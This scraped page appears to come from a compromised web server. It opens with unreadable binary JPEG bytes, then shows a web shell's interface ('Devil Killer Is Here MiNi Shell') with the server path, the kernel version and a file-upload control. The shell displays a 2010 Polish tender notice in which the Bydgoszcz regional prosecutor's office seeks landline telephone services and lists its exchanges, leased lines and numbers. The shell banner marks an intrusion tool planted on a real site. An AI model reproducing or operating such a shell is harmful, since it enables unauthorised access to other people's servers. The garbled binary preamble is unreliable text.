JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100608/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100608/146643-N-2010.html

<p class="kh_header"><b>Bydgoszcz: Świadczenie usług telekomunikacyjnych telefonii stacjonarnej dla Prokuratury Okręgowej w Bydgoszczy i jej jednostek organizacyjnych.</b><br>
<b>Numer ogłoszenia: 146643 - 2010; data zamieszczenia: 08.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prokuratura Okręgowa w Bydgoszczy , ul. Stefana Okrzei 10, 85-317 Bydgoszcz, woj. kujawsko-pomorskie, tel. 52 32 33 130, faks 52 32 33 130.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bydgoszcz.po.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług telekomunikacyjnych telefonii stacjonarnej dla Prokuratury Okręgowej w Bydgoszczy i jej jednostek organizacyjnych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie na rzecz Zamawiającego usług telekomunikacyjnych telefonii stacjonarnej dla Prokuratury Okręgowej w Bydgoszczy oraz jej jednostek organizacyjnych.
    Do obowiązków Wykonawcy w ramach wykonania zamówienia należało będzie:

-Stworzenie grupy biznesowej w ramach jednostek organizacyjnych Zamawiającego. Połączenia w ramach grupy biznesowej  mają być bezpłatne i bez ograniczeń. Ilość numerów, które mają być wpięte w grupę biznesową z bezpłatnymi połączeniami - 300 numerów.
-Zapewnienie możliwości wykonywania połączeń na numery alarmowe.
-Przekazywanie drogą elektroniczną bezpłatnego wykazu zrealizowanych połączeń co miesiąc po wystawieniu faktury z wyszczególnieniem każdego głównego numeru oraz w rozbiciu na poszczególne jednostki organizacyjne, z podziałem na rodzaj połączeń.
-Zapewnienie bezpłatnej blokady połączeń o -podwyższonej- płatności  dla numerów 0-30..., 0-40..., 0-70..., z możliwością jej bezpłatnego usunięcia.
-Wykonawca zapewni na własny koszt przeniesienie numerów telefonów dotychczas wykorzystywanych przez Zamawiającego do swojej sieci:
-przeniesienie numerów z zachowaniem dotychczasowego zakresu numeracji,
-przenoszenie numerów do sieci Wykonawcy musi odbyć się płynnie - bez przerw w świadczeniu usługi,
-Wykonawca jest odpowiedzialny za przygotowanie odpowiedniej dokumentacji oraz uzyskanie niezbędnych pozwoleń i dokonanie wszelkich uzgodnień z dotychczasowym operatorem.

-Zapewnienie dzierżawy cyfrowej centrali telefonicznej wraz z serwisem do obsługi o minimalnej konfiguracji: 
      8 łączy miejskich ISDN BRA (2B + D), min.  8 x porty analogowe miejskie PSTN, 
      min. 80 x porty analogowe wewnętrzne, wyposażonej w taryfikator połączeń, 
      min 8 x porty wewnętrzne systemowe, 4 aparaty systemowe, system LCR, zasilanie 
      awaryjne na ok. 2 godziny pracy, głowicę przyłączeniową, centrala powinna 
posiadać możliwość rozbudowy.

Ponadto przedmiotem zamówienia będzie również wydzierżawienie łączy telefonicznych. 
Poniżej spis istniejących łączy:
Lp.	Relacje łącza 	Orientacyjna długość łącza 
(w km)	uwagi
	od	do		
1	BYDGOSZCZ UL.FARNA 6	BYDGOSZCZ UL.ZAMOJSKIEGO 16	3,89	łacze 300 -3400 z.j.(1 tor)
2	BYDGOSZCZ UL.OKRZEI 10 	BYDGOSZCZ UL.CHODKIEWICZA 61	7,00	teleinformatyczne 64-144 kbit na s-msc
3	BYDGOSZCZ UL.ZAMOJSKIEGO 16	BYDGOSZCZ UL.POWSTAŃCÓW WIELKOPOLSKICH 7 	0,70	łacze 300 -3400 z.j.(1 tor)
4	BYDGOSZCZ UL.PRZYRZECZE 2-4	BYDGOSZCZ UL.POWSTAŃCÓW WIELKOPOLSKICH 7	2,50	łacze 300 -3400 z.j.(1 tor)
5	BYDGOSZCZ UL.PRZYRZECZE 2-4	BYDGOSZCZ UL.POWSTAŃCÓW WIELKOPOLSKICH 7	2,50	łacze 300 -3400 z.j.(1 tor)
6	ŚWIECIE UL.10 LUTEGO 16	ŚWIECIE UL.WOJ.POLSKIEGO 153	0,50	łacze 300 -3400 z.j.(1 tor)
7	TUCHOLA UL.ŚWIECKA 95	TUCHOLA UL.ŚWIECKA 23	3,00	łacze 300 -3400 z.j.(1 tor)
8	BYDGOSZCZ UL.FARNA 6 	BYDGOSZCZ UL.PRZYRZECZE 2- 4	0,40	łacze 300 -3400 z.j.(1 tor)
9	INOWROCŁAW UL.NARUTOWICZA 42 	INOWROCŁAW UL.TORUŃSKA 15	2,00	łacze 300 -3400 z.j.(1 tor)
10	BYDGOSZCZ UL. NOWY RYNEK 10	BYDGOSZCZ UL. POWSTAŃCÓW WIELKOPOLSKICH 7	3,70	łacze 300 -3400 z.j.(1 tor)
11	BYDGOSZCZ UL. NOWY RYNEK 10	BYDGOSZCZ UL. POWSTAŃCÓW WIELKOPOLSKICH 7	3,70	łacze 300 -3400 z.j.(1 tor)
12	SZUBIN UL. OGRODOWA 14	SZUBIN  UL. KCYŃSKA 34	1,50	łacze 300 -3400 z.j.(1 tor)
13	NAKŁO N. NOTECIĄ UL. POCZTOWA 11	NAKŁO N. NOTECIĄ, UL. SĄDOWA 2	1,70	łacze 300 -3400 z.j.(1 tor)
14	BYDGOSZCZ  UL.ZAMOJSKIEGO 16	BYDGOSZCZ  UL.CHODKIEWICZA 61/61	3,00	łacze 300 -3400 z.j.(1 tor)
15	BYDGOSZCZ UL.PRZYRZECZE 2- 4	BYDGOSZCZ UL.CHODKIEWICZA 61	2,60	łacze 300 -3400 z.j.(1 tor)
16	BYDGOSZCZ UL.FARNA 6	BYDGOSZCZ UL.PRZYRZECZE 2- 4	0,40	łacze 300 -3400 z.j.(1 tor)
17	BYDGOSZCZ UL.FARNA 6	BYDGOSZCZ UL.PRZYRZECZE 2- 4	0,40	łacze 300 -3400 z.j.(1 tor)
18	BYDGOSZCZ UL.FARNA 6	BYDGOSZCZ UL.PRZYRZECZE 2- 4	0,40	łacze 300 -3400 z.j.(1 tor)
19	BYDGOSZCZ UL.FARNA 6	BYDGOSZCZ UL.PRZYRZECZE 2- 4	0,40	łacze 300 -3400 z.j.(1 tor)
20	BYDGOSZCZ UL.FARNA 6	BYDGOSZCZ UL.PRZYRZECZE 2- 4	0,40	łacze 300 -3400 z.j.(1 tor)
21	BYDGOSZCZ UL.FARNA 6	BYDGOSZCZ UL.PRZYRZECZE 2- 4	0,40	łacze 300 -3400 z.j.(1 tor)
22	BYDGOSZCZ UL.FARNA 6	BYDGOSZCZ UL.PRZYRZECZE 2- 4	0,40	łacze 300 -3400 z.j.(1 tor)
23	BYDGOSZCZ UL.FARNA 6	BYDGOSZCZ UL.PRZYRZECZE 2- 4	0,40	łacze 300 -3400 z.j.(1 tor)
24	BYDGOSZCZ UL.FARNA 6	BYDGOSZCZ UL.PRZYRZECZE 2- 4	0,40	łacze 300 -3400 z.j.(1 tor)
25	BYDGOSZCZ UL.FARNA 6	BYDGOSZCZ UL.PRZYRZECZE 2- 4	0,40	łacze 300 -3400 z.j.(1 tor)
26	BYDGOSZCZ UL.FARNA 6	BYDGOSZCZ UL.PRZYRZECZE 2- 4	0,40	łacze 300 -3400 z.j.(1 tor)
27	BYDGOSZCZ UL.FARNA 6	BYDGOSZCZ UL.PRZYRZECZE 2- 4	0,40	łacze 300 -3400 z.j.(1 tor)
28	BYDGOSZCZ UL.FARNA 6	BYDGOSZCZ UL.PRZYRZECZE 2- 4	0,40	łacze 300 -3400 z.j.(1 tor)
29	BYDGOSZCZ UL.FARNA 6	BYDGOSZCZ UL.PRZYRZECZE 2- 4	0,40	łacze 300 -3400 z.j.(1 tor)
30	BYDGOSZCZ UL.FARNA 6	BYDGOSZCZ UL.PRZYRZECZE 2- 4	0,40	łacze 300 -3400 z.j.(1 tor)
31	BYDGOSZCZ UL.FARNA 6	BYDGOSZCZ UL.PRZYRZECZE 2- 4	0,40	łacze 300 -3400 z.j.(1 tor)
32	BYDGOSZCZ UL.FARNA 6	BYDGOSZCZ UL.PRZYRZECZE 2- 4	0,40	łacze 300 -3400 z.j.(1 tor)
33	BYDGOSZCZ UL.FARNA 6	BYDGOSZCZ UL.PRZYRZECZE 2- 4	0,40	łacze 300 -3400 z.j.(1 tor)
34	BYDGOSZCZ UL.FARNA 6	BYDGOSZCZ UL.PRZYRZECZE 2- 4	0,40	łacze 300 -3400 z.j.(1 tor)
35	BYDGOSZCZ UL.FARNA 6	BYDGOSZCZ UL.PRZYRZECZE 2- 4	0,40	łacze 300 -3400 z.j.(1 tor)
36	BYDGOSZCZ UL.FARNA 6	BYDGOSZCZ UL.PRZYRZECZE 2- 4	0,40	łacze 300 -3400 z.j.(1 tor)
37	BYDGOSZCZ UL.FARNA 6	BYDGOSZCZ UL.PRZYRZECZE 2- 4	0,40	łacze 300 -3400 z.j.(1 tor)
38	BYDGOSZCZ UL.FARNA 6	BYDGOSZCZ UL.PRZYRZECZE 2- 4	0,40	łacze 300 -3400 z.j.(1 tor)
39	BYDGOSZCZ UL.FARNA 6	BYDGOSZCZ UL.PRZYRZECZE 2- 4	0,40	łacze 300 -3400 z.j.(1 tor)
40	BYDGOSZCZ UL.FARNA 6	BYDGOSZCZ UL.PRZYRZECZE 2- 4	0,40	łacze 300 -3400 z.j.(1 tor)
41	BYDGOSZCZ UL.FARNA 6	BYDGOSZCZ UL.PRZYRZECZE 2- 4	0,40	łacze 300 -3400 z.j.(1 tor)
42	BYDGOSZCZ UL.FARNA 6	BYDGOSZCZ UL.PRZYRZECZE 2- 4	0,40	łacze 300 -3400 z.j.(1 tor)
43	BYDGOSZCZ UL.FARNA 6	BYDGOSZCZ UL.PRZYRZECZE 2- 4	0,40	łacze 300 -3400 z.j.(1 tor)
44	BYDGOSZCZ UL.FARNA 6	BYDGOSZCZ UL.PRZYRZECZE 2- 4	0,40	łacze 300 -3400 z.j.(1 tor)
45	BYDGOSZCZ UL.FARNA 6	BYDGOSZCZ UL.PRZYRZECZE 2- 4	0,40	łacze 300 -3400 z.j.(1 tor)
46	BYDGOSZCZ UL.FARNA 6	BYDGOSZCZ UL.PRZYRZECZE 2- 4	0,40	łacze 300 -3400 z.j.(1 tor)



Wykaz istniejącej infrastruktury wraz z wykazem nr miejskich w jednostkach okręgu bydgoskiego.

Prokuratura Okręgowa w Bydgoszczy, ul. Farna 6

1.	Centrala telefoniczna - Alcatel 4200E (centrala dzierżawiona) - cyfrowa
2.	ISDN
-8 łączy ISDN BRA - DDI 34-77-500 do 599
3.	PSTN

Prokuratura Okręgowa w Bydgoszczy, ul. Stefana Okrzei 10

1. Centrala telefoniczna - Silcan MAC - 6400
2. ISDN PRA (30 B+D) 15 kanałów
3. 2 łącza analogowe:
- 348 - 79 -  48
- 348 - 28 - 34
4. 1 łącze na potrzeby ochrony i monitoringu - 340 - 94 - 84

-321 - 75 - 05
-321 - 75 - 07
-321 - 75 - 09
-321 - 75 - 10

Prokuratura Okręgowa w Bydgoszczy, ul. Zamojskiego 16

1.	Centrala telefoniczna - Panasonic 
2.	ISDN ( 3 szt. )
-MSN---345-71-21 
-MSN---321-60-35 

Prokuratura Rejonowa w Bydgoszcz - Północ

1.   Centrala telefoniczna - wspólna z Prokuraturą Okręgową
2.	ISDN ( 1 szt. )
-MSN - 322-46-10 

Prokuratura Rejonowa Bydgoszcz - Południe

1.	Centrala telefoniczna - MATRA cyfrowa
2.	ISDN PRA (30 B+D) - DDI 34-77-600 do 699
3.	ISDN ( 6 szt. )
-MSN1---373-24-76 
MSN2---373-16-42 
-MSN1---373-24-53 
MSN2---373-16-59 
-ISDN BRA - 373-91-65 
-ISDN BRA - 373-91-70 
-ISDN BRA - 373-91-80 
-ISDN BRA - 373-91-95 

Prokuratura Rejonowa w Inowrocławiu

1.	Centrala telefoniczna - SLICAN MAC 6400 - cyfrowa
2.	ISDN
-3 łącza ISDN (2 B+D) - DDI 353-25-10 do 69

Prokuratura Rejonowa w Tucholi

1.	Centrala telefoniczna - PLATAN MICRA - cyfrowa
2.	ISDN ( 2 szt.)
-MSN1---334-27-41 
      MSN2---336-56-85 
-MSN1---334-84-20 

Prokuratura Rejonowa w Szubinie

1.	Centrala telefoniczna - Panasonic KX-TA 308 - analogowa
2.	ISDN ( 2 szt. )
-MSN1---384-24-80 
MSN2---384-24-01 
-MSN1---391-09-25 

Prokuratura Rejonowa w Świeciu

1.	Centrala telefoniczna - Panasonic 6/16 
2.	ISDN ( 4 szt.)
-MSN1---331-18-16 
MSN2---330-25-91 
-MSN---331-34-73 
-MSN---331-18-15 
-MSN---331-23-02 

Prokuratura Rejonowa w Mogilnie

1.	Centrala telefoniczna - Slican 6/16 - analogowa
2.	ISDN ( 2 szt.)
-MSN---315-23-34 
-MSN---318-04-60 

Prokuratura Rejonowa w Nakle Nad Notecią

1.	Centrala telefoniczna - prokuratura podłączona do centrali SIEMENS HICOM w Sądzie
2.	ISDN
-2 łącza ISDN (2B+D) - DDI 386-78-60 do 99

Ośrodek Zamiejscowy w Żninie

1.	Centrala telefoniczna - Panasonic KX-TA 308 3/8
2.	ISDN ( 1 szt. )
MSN---303-47-30 



Połączenia (średnia ilość połączeń za okres październik - grudzień 2009 r.)
a) lokalne i strefowe - średnia miesięczna ilość połączeń wynosi ok. 17330 
b) komórkowe (bez PLAY) - średnia miesięczna ilość połączeń wynosi ok. 2780
c) międzystrefowe - średnia miesięczna ilość połączeń wynosi ok. 1880
d) komórkowe ( PLAY) - średnia miesięczna ilość połączeń wynosi - ok. 120
e) międzynarodowe - średnia miesięczna ilość połączeń wynosi ok.  30

Usługa powinna obejmować:
a) sekundowe naliczanie czasu realizowanych rozmów telefonicznych, począwszy 
   od  pierwszej sekundy połączenia
b) prezentację identyfikacji numerów połączeń przychodzących 
c) możliwość ukrycia prezentacji numeru przy połączeniach wychodzących
d) automatyczny wybór prefiksu operatora
e) świadczenie usługi 24/h na dobę, 7 dni w tygodniu
f) podłączenie łączy, w poszczególnych lokalizacjach, bez powodowania przerw w pracy
g) 24 - godzinny dostęp do serwisu (maksymalny czas usunięcia uszkodzenia - 8 godzin od momentu wystąpienia awarii).
h) usługa musi być świadczona na infrastrukturze kablowej Wykonawcy...</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, zgodnie z art. 67 ust. 1 pkt 6 Ustawy, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 64.21.10.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do oferty każdy z Wykonawców powinien załączyć zaświadczenie  wpisie do rejestru przedsiębiorców telekomunikacyjnych (podstawa prawna wpisu: art. 11 w zw. z art. 10 ust. 1 ustawy z dnia 16 lipca 2004 roku Prawo telekomunikacyjne (Dz. U. z 2004 r., nr 171, poz. 1800 z późn. zm.).5.1.6
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na zasadzie zastosowania formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do oferty każdy z Wykonawców powinien załączyć wykaz wykonanych -wykonywanych w okresie ostatnich trzech lat co najmniej trzech usług telekomunikacyjnych telefonii stacjonarnej, odpowiadających swoim rodzajem i wartością usłudze będącej przedmiotem zamówienia (minimalna wartość zamówienia 300.000,00 zł brutto), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz dokumenty potwierdzające, ze usługi te zostały wykonanie/są wykonywane należycie - załącznik nr 6 do SIWZ.
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na zasadzie zastosowania formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do oferty każdy z Wykonawców powinien załączyć oświadczenie zgodne z art. 22 ust. 1 pkt 1-4 Pzp - załącznik numer 2 do SIWZ.
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na zasadzie zastosowania formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do oferty każdy z Wykonawców powinien załączyć oświadczenie zgodne z art. 22 ust. 1 pkt 1-4 Pzp - załącznik numer 2 do SIWZ.
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na zasadzie zastosowania formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do oferty każdy z Wykonawców powinien załączyć oświadczenie zgodne z art. 22 ust. 1 pkt 1-4 Pzp - załącznik numer 2 do SIWZ, jednocześnie do oferty należy załączyć: opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę minimum 500.000,00 zł.
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na zasadzie zastosowania formuły spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

